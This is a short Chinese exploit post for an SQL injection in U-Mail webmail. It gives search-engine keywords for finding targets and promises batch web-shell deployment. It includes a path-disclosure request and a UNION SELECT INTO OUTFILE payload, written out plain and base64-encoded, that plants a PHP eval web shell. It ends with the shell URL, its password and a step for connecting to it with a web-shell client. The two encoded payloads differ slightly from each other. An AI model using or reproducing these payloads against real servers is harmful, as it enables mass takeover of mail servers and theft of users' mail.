U-Mail注入之任意代码写入exp

u-mail中某个文件由于参数过滤不严谨导致产生了SQL注入,通过此漏洞可以将shell写入到web目录下,可批量getshell。 Baidu & Google Keywords: ————————————————————- Power by U-Mail * 精准反垃圾,有效过滤超过98.6%的垃圾邮件 * 病毒邮件有效拦截率超过99.9%; * * 等等…自由构造! * ————————————————————- 漏洞利用: 要想写入shell必须知道其物理路径对吧,可通过此方法获取物理路径,当然这只是鸡肋爆路径,大家还可以继续研究: [php] http://0day5.com/webmail/userapply.php?execadd=333&DomainID=111 [/php] 得到物理路径:E:\umail\WorldClient\html\userapply.php [php] aa' union select 1,2,3,4,5,6,'',8,9,10,11,12,13,14 into outfile 'E:/umail/WorldClient/html/bge.php'#[/php] 将其base64加密一下,记得路径是“/”,而不是”\” 得到: [php] YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPCEtLT9waHAgZXZhbCgkX1BPU1QxKTs/LS0+Jyw4LDksMTAsMTEsMTIsMTMsMTQgaW50byBvdXRmaWxlICdFOi91bWFpbC9Xb3JsZENsaWVudC9odG1sL2JnZS5waHA=[/php] [php]http://0day5.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==[/php] 就将shell写进了web目录中,shell地址: [php]http://0day5.com/webmail/bge.php[/php] password:shell 然后菜刀链接

发表评论